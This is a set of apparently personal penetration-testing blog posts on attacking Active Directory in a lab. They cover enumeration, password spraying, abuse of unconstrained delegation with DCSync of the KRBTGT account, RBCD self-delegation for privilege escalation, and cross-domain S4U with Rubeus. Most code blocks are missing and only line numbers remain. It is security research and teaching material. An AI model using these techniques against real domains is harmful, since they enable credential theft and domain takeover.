1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
As shoiwn above, a bunch of ports are open on the target domain controller, these can be further probed using the -sV
option:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
|
This is known as a service scan and attempts to probe the listening service and return a reliable software name and version.
Some Basic Enumeration
LDAP Enumeration
As we can see Lightweight Directory Access Protocol (LDAP) is listening on a number of ports. That is an indication that this system is a domain controller.
The LDAP specification states that the server must provide some information about the {RootDSE](https://ldapwiki.com/wiki/RootDSE){:target="_blank"} even without authentication. This allows us to gather some basic information about the domain:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 |
|
The ldap-rootdse
Nmap script shows us that this domain controller belongs to a child domain (child1.internal.zeroday.lab), shown in the defaultNamingContext attribute, and the root domain is internal.zeroday.lab, shown in the rootDomainNamingContext attribute.
DNS Enumeration
Along with LDAP, the port scan showed that this system was listening on UDP port 53, this is almost certainly Domain Name System (DNS). DNS can be queried to determine the domain controllers for a particular domain:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
|
It can also be used to query the root domain's domain controllers:
1 2 3 4 |
|
SMB Enumeration
Server Message Block (SMB) can be really useful for attackers, there are many possible attacks against the service. Here I'll only perform some very basic enumeration.
First it's useful to know whether NULL authentication is permitted. A Metasploit module can be used to test for this:
1 2 3 4 |
|
So we can access SMB pipes without requiring a username and password. While this isn't that common these days on domain controllers, I have seen this on some corporate networks.
We should also try enumerating users. Another Metasploit module can be used for this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 |
|
Password Spraying
Now that we have a list of valid usernames, it's worth trying to guess a valid password. Password spraying is a method of attack where you take a list of valid, or potentially valid, usernames and attempt to try different commonly used passwords across all usernames.
The lab environment is small but in a real world AD infrastructure it's very likely to be able to guess passwords for some accounts. Of course on a real infrastrcture extreme care has to be taken before attempting to perform password spraying attacks as there is a real possibilty of locking user accounts.
To perform a password spray CrackMapExec can be used:
1 2 3 4 5 6 |
|
The password for the child.user account was discovered in this password spray attempt. Now recon from an authenticated point of view is possible on this domain.
Conclusion
AD security is a huge topic and I've only began the scrath the surface in this post, even from an unauthenticated point of view. Hopefully this was a half decent way to introduce the topic though.
It's worth noting that there are many toold that perform the same tests carried out in this post, but some of them did not work. I might make a post demonstrating that because it's important to understand that different tools will work in different situations, so it's very useful to have knowledge of many and try others when your first choice fails.
Further Reading
If you are serious about AD security, the best resource out there is adscurity.org by Sean Metcalf.
Abusing Users Configured with Unconstrained Delegation
An interesting situation came up on a recent assessment which triggered me into do a bit of research in the area as I'd seen nothing published on this particular issue.
I'd been really interested in the research done on the area of Kerberos Delegation. For this post, I'll be discussing Unconstrained Delegation, which has been covered a great deal in other places, notably here by Sean Metcalf and here by Dirk-jan Mollema, amongst others. If you really want to understand what is going on here, it might be best to read their work and understand it before continuing, although I'll try to give a recap here.
Unconstrained Delegation 101
In a nutshell, unconstrained delegation is when a user or computer has been granted the ability to impersonate users in an Active Directory domain with the only restriction of those contained within the Protected Users group or marked Sensitive and cannot be delegated.
What happens in short (read Sean's post if you want a detailed explaination, that's where this section is plagiarised from), after a user has already authenticated and wants to access a service that's been configured for unconstrained delegation:
-
The user presents it's TGT to th DC when requesting a service ticket.
-
The DC opens the TGT & validates PAC checksum – If the DC can open the ticket & the checksum check out, the TGT is valid. The data in the TGT is effectively copied to create the service ticket. The DC places a copy of the user’s TGT into the service ticket.
-
The service ticket is encrypted using the target service accounts’ NTLM password hash and sent to the user (TGS-REP).
-
The user connects to the server hosting the service on the appropriate port & presents the service ticket (AP-REQ). The service opens the service ticket using its NTLM password hash.
The diagram below (also taken from Sean's post) shows the full process:
The Situation
While abusing unconstrained delegation has been covered in detail many times, all of these posts address machine accounts, I've not yet seen anything related to abusing users configured for unconstrained delegation.
The setup for the demo is simple. A domain internal.zeroday.lab, with a domain controller IDC1 and a user TestUCSPN which has been configured for unconstrained delegation, as can be seen below:
As shown, the TrustedForDelegation attribute is set to True and the ServicePrincipalName is set to cifs/notexist.internal.zeroday.lab. The cifs service is being used here purly for convinence in demonstrating the issue.
The DNS record for notexist.internal.zeroday.lab does not exist:
This is all that is required to exploit it because the password for the machine account is not needed, but in this example the machine account also doesn't exist:
This allows me to demonstrate that it is still exploitable, by creating the machine account, using Kevin Robertson's Powermad:
Abuse
While it doesn't matter if the machine account is created in Active Directory, the DNS record needs to not exist for this attack to work (or it needs to point to a machine under your control).
If the DNS record doesn't exist, like in this example, it's easy to create one using any valid domain user account. Here I'm using Dirk-jan Mollema's krbrelayx:
Here 192.168.71.198 is the IP address of a Linux system under my control.
Sometimes it takes a little while for the name to resolve so it's good to check before continuing:
Now everything is in place to abuse this configuration. First, we need the hash of the service account's password (TestUCSPN in this case). For this Benjamin Delpy's tool mimikatz does the job nicely:
To retrieve the target's TGT ticket, we'll again use Dirk-jan Mollema's krbrelayx:
And from the same repository the printerbug.py script to trigger the authentication from the domain controller (192.168.71.20) to the target SPN host (notexist.internal.zeroday.lab):
This coerces the domain controller to authentication to the CIFS service on host noexist.internal.zeroday.lab where the krbrelayx.py script is listening. The krbrelatx.py script saves the ticket in ccache format:
This saved the ticket in the current working directory with the name [email protected][email protected].
For some reason, converting it to kirbi format using krbrelayx.py was failing with the error below:
Of course, you could using the ccache format with impacket but I decided to use Will Schroeder's Rubeus so I needed the ticket in kirbi format.
To convert the ticket I used Zer1t0's ticket_converter and then base64 encoded it:
This is now usable by Rubeus.
First, to demonstrate the a DCSync is not possible from the current context, mimikatz was used:
Lastly, Rubeus is used to inject the ticket into the current context and then mimikatz is able to perform a DCSync of the KRBTGT account from the domain controller:
Conclusion
One of the interesting things I find about attacks like this is here I used the TGT for the domain controller IDC1 to perform a DCSync from the same domain controller IDC1. I'm not sure why this is possible as I can see no reason why a domain controller would need to synchronize with itself, but it works...
This post is, as far as I've seen, the first explaination of how to take advantage of unconstrained delegation without requiring to compromise any machines and while it's most likely an uncommon situation, I have seen this in the wild recently.
Kerberos delegation is a really interesting point of research and I'm sure there will be plenty more research coming out in the future so it's well worth getting up to date with the current research out there.
Delegate 2 Thyself
This post is also avaliable in PDF format here.
So a situation arose on the BloodHound Slack channel recently which is very similar to the one I'm going to describe in this post and the user could have benefited from this so I've decided to speed up my writing of this particular post. It's going to involve using resource-based constrained delegation (RBCD) for local privilege escalation.
Firstly, there are much better resources for a full explaination of the RBCD theory and attack vectors, the best I've read Wagging the Dog by Elad Shamir but also this and this by Will Schroeder, and even the Microsoft Kerberos documentation if you are really looking at understanding how Kerberos works as a whole.
I learned everything I know about RBCD from the posts mentioned above, so I highly recommend reading and understanding those if you truly want to understand RBCD.
Here I'll simply be explaining an attack that, while very similar to some being spoken about, I've not really seen anywhere, while trying to clear up a few areas of confusion a lot of people seem to have on the topic.
Resource-Based Constrained Delegation 101
While those other posts are without doubt the place to go if you want to understand how this works, I'll try to give a little recap of the essentials here.
Delegation is used in Kerberos to allow services to delegate (impersonate) as other users to other services. This is so that, for example, if a user access a web server and that web server is using a database server in the background, the web server is able to impersonate the user to access the database server and only gain access to the data owned by that user.
Resource-Based Constrained Delegation is governed by an Access Control List (ACL) contained within the msDS-AllowedToActOnBehalfOfOtherIdentity Active Directory attribute of the target machine account. This means if you want AccountA to be able to delegate to AccountB, then you have to set an Access Control Entry (ACE) within the ACL in the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on AccountB for AccountA.
Confusion 1 - Service Accounts
So as Elad mentions in his post that SYSTEM, NT AUTHORITY\NETWORK SERVICE and Microsoft Virtual Accounts all authenticate on the network as the machine account on domain-joined systems. This is really useful to know as most Windows services on modern versions of Windows will run using a Microsoft Virtual Account by default. The 2 most notable are IIS and MSSQL but I'm sure there are many more.
This can be verified very easily:
This authenticates against 192.168.71.198 where I have impacket's smbserver.py script listening:
In any situation where the machine is domain-joined and you can run code as NT AUTHORITY\NETWORK SERVICE or a Microsoft Virtual Account, you can use RBCD for local privilege escalation, provided that Active directory hasn't been hardered to mitigate the RBCD attacks completely (which is very rarely the case).
The Situation
So here I'm going to perform the attack from a domain-joined (external.zeroday.lab) IIS server (EIIS1) where code execution has already been achieved. As we already know, this account will authenticate on the domain as the machine account:
Firstly, load the the ADModule from Nikhil Mittal and Will Schroeder's PowerView to be used throughout this post:
The last thing to note is a domain admin (and the user we're going to impersonate) is external.admin:
Confusion 2 - Machines Creating Machines
Generally with these RBCD attacks you require a second account with an service principal name (SPN), the common method is to create a new machine account as by default the machine account quota is 10:
I've seen some confusion on whether a machine account can be used to create another machine account. It is possible to create a machine account using a machine account, this can be done using Kevin Robertson's Powermad:
Now querying the domain controller, the newly created machine account can be seen:
The Crazy Bit
For this post though, I want to show that even if the machine account quota is 0, and access to another account with an SPN hasn't been achieved, it's still possible to abuse RBCD for privilege escalation. So the machine account quota has been reset to 0:
Now it is not possible to create a new machine account:
So here's the main reason for this blog, I was thinking one day "I wonder if a machine can delegate access to itself". So effectively, I (the machine account) want to tell the domain controller that I (the machine account) wants the ability to delegate access to myself (the machine account). I'm not sure why this would ever be required in a normal setup, but it in fact is possible.
So using the shell that I've already imported the ADModule, I can set the msDS-AllowedToActOnBehalfOfOtherIdentity:
This is all that is required to configure RBCD. To demonstrate that it has infact worked, I can run Get-ADComputer
from another terminal (because showing the extended attributes using the ADModule doesn't work):
So now I have the ability to impersonate any domain user on the machine, that isn't in the Protected Users group or marked as Sensitive and cannot be delegated.
Abusing This Configuration
There's one more piece of the puzzle before we can actually perform the attack. We need to be able to pass Rubeus credentials for the machine account. This can be in the form of a username and password, or a TGT ticket.
Luckily Benjamin Delpy figured out how to do this, it's now called the tgtdeleg trick and it's also been implemented in Rubeus.
So after downloading Rubeus onto the compromised system, we can easily use it to grab a usable TGT:
That TGT can be used with the s4u Rubeus command to request a service ticket to HTTP/EIIS1.external.zeroday.lab (myself) as the user external.admin and injected into the current context:
Now when we use Invoke-Command to EIIS1.external.zeroday.lab, it runs as external.admin:
Cleanup
When on an assessment, it's always important to clean up any changes made to systems to return them to the original settings as much as possible. The RBCD configuration can be reset to it's original state using the machine account again, if domain admin privileges hasn't been achieved.
If the configuration was originally empty, this can be done in the following way:
And to verify that this worked:
Conclusion
Delegation is hard and often configured wrong so it's important to understand the scope of what is possible using these Kerberos features.
Active Directory in it's default configuration is vulnerable to a number of different attacks and these settings rarely get changed by the system administrator so this is often a very fruitful avenue for an attacker.
To secure AD against this attack is no different to those described by Elad in his post, there's nothing really new here apart from the idea of delegating to the same account.
Crossing Trusts 4 Delegation
The purpose of this post is to attempt to explain some research I did not long ago on performing S4U across a domain trust. There doesn't seem to be much research in this area and very little information about the process of requesting the necessary tickets.
I highly recommend reading Elad Shamir's Wagging the Dog post before reading this, as here I'll primarily focus on the differences between performing S4U within a single domain and performing it across a domain trust but I won't be going into a huge amount of depth on the basics of S4U and it's potential for attack, as Elad has already done that so well.
Motivation
I first thought of the ability to perform cross domain S4U when looking at the following Microsoft advisory. It states:
“To re-enable delegation across trusts and return to the original unsafe configuration until constrained or resource-based delegation can be enabled, set the EnableTGTDelegation flag to Yes.”
This makes it clear that it is possible to perform cross domain constrained delegation. The problem was I couldn't find anywhere that gave any real detail as to how it is performed, and the tools used to take advantage of constrained delegation did not support it.
Luckily Will Schroeder published how to simulate real delegation traffic:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
|
This allowed me to figure out how it works and implement it into Rubeus.
Recap
To perform standard constrained delegation, 3 requests and responses are required: 1. AS-REQ and AS-REP, which is just the standard Kerberos authentication. 2. S4U2Self TGS-REQ and TGS-REP, which is the first step in the S4U process. 3. S4U2Proxy TGS-REQ and TGS-REP, which is the actual impersonation to the target service.
I created a visual representation as the ones I've seen previously weren't the easiest to understand:
In this it's the ticket contained within the final TGS_REP that is used to access the target service as the impersonated user.
Some Theory
After hours of using Will's Powershell to generate S4U traffic and staring at packet dumps, this is how I understood cross domain S4U to work:
Clearly there's a lot more going on here, so let me try to explain.
-
The first step is still the same, a standard Kerberos authentication with the local domain controller. (1 and 2)
-
A service ticket is requested for the foreign domains krbtgt service from the local domain controller. (3 and 4)
- The users real TGT is required for this request.
- This is known as the inter-realm TGT or cross domain TGT. This resulting service ticket is used to request service tickets for services on the foreign domain from the foreign domain controller.
Here's where things start to get a little complicated. And the S4U2Self starts.
-
A service ticket for yourself as the target user you want to impersonate is requested from the foreign domain controller. (5 and 6)
- This requires the cross domain TGT.
- This is the first step in the cross domain S4U2Self process.
-
A service ticket for yourself as the user you want to impersonate is now requested from the local domain controller. (7 and 8)
- This request includes the users normal TGT as well as having the S4U2Self ticket, received from the foreign domain in step 3, attached as an additional ticket.
- This is the final step in the cross domain S4U2Self process.
And finally the S4U2Proxy requests. As with S4U2Self, it involves 2 requests, 1 to the local DC and 1 to the foreign DC.
-
A service ticket for the target service (on the foreign domain) is requested from the local domain controller. (9 and 10)
- This requires the users real TGT as well as the S4U2Self ticket, received from the local domain controller in step 4, attached as an additional ticket.
- This is the first step in the cross domain S4U2Proxy process.
-
A service ticket for the target service is requested from the foreign domain controller. (11 and 12)
- This requires the cross domain TGT as well as the S4U2Proxy ticket, received from the local domain controller in step 5, as an additional ticket.
- This is the service ticket used to access the target service and the final step in the cross domain S4U2Proxy process.
I implemented this full process into Rubeus with this PR, which means that the whole process can be carried out with a single command.
The implementation primarily involves the CrossDomainS4U()
, CrossDomainKRBTGT()
, CrossDomainS4U2Self()
and CrossDomainS4U2Proxy()
functions, along with the addition of 2 new command line switches, /targetdomain
and /targetdc
, and some other little modifications.
Basically when /targetdomain
and /targetdc
are passed on the commandline, Rubeus executes a cross domain S4U, otherwise a standard one is performed.
What's The Point?
Good question. This could be a useful attack path in some unusual situations. Let me try to explain one.
Consider the following infrastructure setup:
There are 2 domains, in a single forest. internal.zeroday.lab (the parent and root of the forest) and child1.internal.zeroday.lab (a child domain).
We've compromised a standard user, child.user, on child1.internal.zeroday.lab, this user can also authenticate against the SQL server ISQL1 in internal.zeroday.lab as a low privileged user:
As Elad mentions in the MSSQL section of his blog post, if the SQL server has the WebDAV client installed and running, xp_dirtree can be used to coerce an authentication to port 80.
What is important here is that the machine account quota for internal.zeroday.lab is 0:
This means that the standard method of creating a new machine account using the relayed credentials will not work:
The machine account quota for child1.internal.zeroday.lab is still the default 10 though:
So the user child.user can be used to create a machine account within the child1.internal.zeroday.lab domain:
As the machine account belongs to another domain, ntlmrelayx.py is not able to resolve the name to a SID:
For this reason I made a small modification which allows you to manually specify the SID, rather than a name. First we need the SID of the newly created machine account:
Now the --sid
switch can be used to specify the SID of the machine account to delegate access to:
The configuration can be verified using Get-ADComputer
:
Impersonation
So now everything is in place to perform the S4U and impersonate users to access ISQL1.
The NTLM hash of the newly created machine account is the ast thing that is required:
The following command can be used to perform the full attack and inject the service ticket for immediate use:
1 |
|
This command does a number of things but simply put, it authenticates as TestChildSPN$ from child1.internal.zeroday.lab against IC1DC1.child1.internal.zeroday.lab and impersonates internal.admin from internal.zeroday.lab to access http/ISQL1.internal.zeroday.lab.
Now let's look at this in a bit more detail.
As described previously, the first step is to perform a standard Kerberos authentication and recieve the account's TGT that has been delegated access (TestChildSPN in this case):
This TGT is then used to request the cross domain TGT from IC1DC1.child1.internal.zeroday.lab (the local domain controller):
This is simply a service ticket to krbtgt/internal.zeroday.lab. This cross domain TGT is then used on the foreign domain in exactly the same manner the users real TGT is used on the local domain.
It is this ticket that is then used to request the S4U2Self service ticket for TestChildSPN$ for the user internal.admin from IDC1.internal.zeroday.lab (the foreign domain controller):
To complete the S4U2Self process, the S4U2Self service ticket is requested from IC1DC1.child1.internal.zeroday.lab, again for TestChildSPN$ for the user internal.admin, but this time the users real TGT is used and the S4U2Self service ticket retrieved from the foreign domain in the previous step is attached as an additional ticket within the TGS-REQ:
To begin the impersonation, a S4U2Proxy service ticket is requested for the target service (http/ISQL1.internal.zeroday.lab in this case) from IC1DC1.child1.internal.zeroday.lab. As this request is to the local domain controller the users real TGT is used and the local S4U2Self, received in the previous step, is atached as an additional ticket in the TGS-REQ:
Lastly, a S4U2Proxy service ticket is also requested for http/ISQL1.internal.zeroday.lab from IDC1.internal.zeroday.lab. As this request is to the foreign domain controller, the cross domain TGT is used, and the local S4U2Proxy service ticket received in the previous step is attached as an additional ticket in the TGS-REQ. Once the final ticket is received, Rubeus automatically imports the ticket so it can be used immediately:
Now that the final service ticket has been imported it's possible to get code execution on the target server:
Conclusion
While it was possible to perform this across trusts within a single forest, I didn't manage to get this to work across external trusts. It would probably be possible but would require a non-standard trust configuration.
With most configurations this wouldn't be required as you could either create a machine account within the target domain or delegate to the same machine account, as I've discussed in a previous post, but it's important to understand the limits of what is possible with these types of attacks.
The mitigations are exactly the same as Elad discusses in his blog post as the attack is exactly the same, the only difference is here I'm performing it across a domain trust.
Acknowledgements
A big thaks to Will Schroeder for all of his work on delegation attacks and Rubeus. Also Elad Shamir for his detailed work on resource-based constrained delegation attacks and contributions to Rubeus which helped me greatly when trying to implement this. Benjamin Delpy for all of his work on Kerberos tickets in mimikatz and kekeo.
I'm sure there are many more too, without these guys work, research in this area would be much further behind where it currently is!